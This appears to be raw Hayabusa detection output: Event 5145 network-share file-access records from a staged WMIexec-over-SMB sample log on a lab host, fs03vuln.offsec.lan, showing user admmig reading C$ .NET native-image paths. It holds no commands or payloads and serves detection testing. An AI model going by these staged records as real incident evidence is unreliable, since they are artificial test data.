10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B46c55d17#\a3f0de129553f858134a0e204ddf44c3 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.642 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B83e9cb53# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.642 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B83e9cb53#\b2eb2f250605eb6b697ed75a050e9fa1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B3325a29b# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B3325a29b#\2d63d4f586d1192cb1d550c159a42729 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Baa2ca56b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Baa2ca56b#\71d44db8d855f43bafe707aabf0050d7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Bfc9dc24d# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Bfc9dc24d#\d33525eb35c4aa8b45b1e60e144e50ab : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.683 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Build : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.683 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Build\d6c8ca8dfe9cd143210459e72a546bf8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.683 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C8d726d22# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.683 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C8d726d22#\95eb335a0d6884a4b311ce7041f71bc3 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.699 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C25dcfcb8# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.699 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C25dcfcb8#\81fd3145ed18f31e338ec4dcb5afd7f7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.699 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C26a36d2b# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.699 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C26a36d2b#\2dab9f12dfcdb3bd487693c1bb12e0a6 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.714 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ca018eff0# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.714 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ca018eff0#\4d5abc40df9ad72124f147d1d55dd690 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.714 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.CSharp : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.CSharp\004d51a9ac1d91d6537ad572591ebbd3 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.D0ff51f83# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.D0ff51f83#\b7a83293c2e4f23480fc3660b70099e6 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.G46fcc235# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.G46fcc235#\f8fa567f21f9aef0ae471c625b59c159 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.G91a07420# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.G91a07420#\5d1b6f60febb9cec91a92675a96ee63d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.746 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ga41585c2# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.746 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ga41585c2#\b101a91893057573f159893cb9c2f28d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.746 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I0cd65b90# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.746 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I0cd65b90#\e037edd0e9a4a487424cd2d4e3527c92 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I7676db1a# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I7676db1a#\aaf7a4161dcd6792ce570a810a0c53f6 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ib6702479# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ib6702479#\662c453241af44299325f4c07d7f718c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ic1a2041b# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ic1a2041b#\154acb6c70e2dddd2c94bf0bc748b8b7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ifcaec084# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ifcaec084#\9d9142f584dbdd4e6d4bd7fd6f877b66 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Kd58820a5# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Kd58820a5#\ba928c3b8a0cdac392162a6b572de29f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.M870d558a# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.M870d558a#\1b67145a56e345e0d2e731357f498c1d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Meefd589e# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Meefd589e#\e857b644c45626101624d874e1860701 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf5ac9168# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf5ac9168#\1b9aff98baffeed692a8e8768c0c4e47 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf49f6405# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf49f6405#\2f732bd1dcfeef1bb935c1d1444abdef : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mff1be75b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mff1be75b#\4844f53bd0e47d8f8a5795e6484a0f88 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P0e11b656# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P0e11b656#\a169d08938fb7766d16496db1e648137 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.811 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f9a5e83# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.811 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f9a5e83#\75b419c806fb708ac368c6282c922a84 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f792626# : IP Address: 
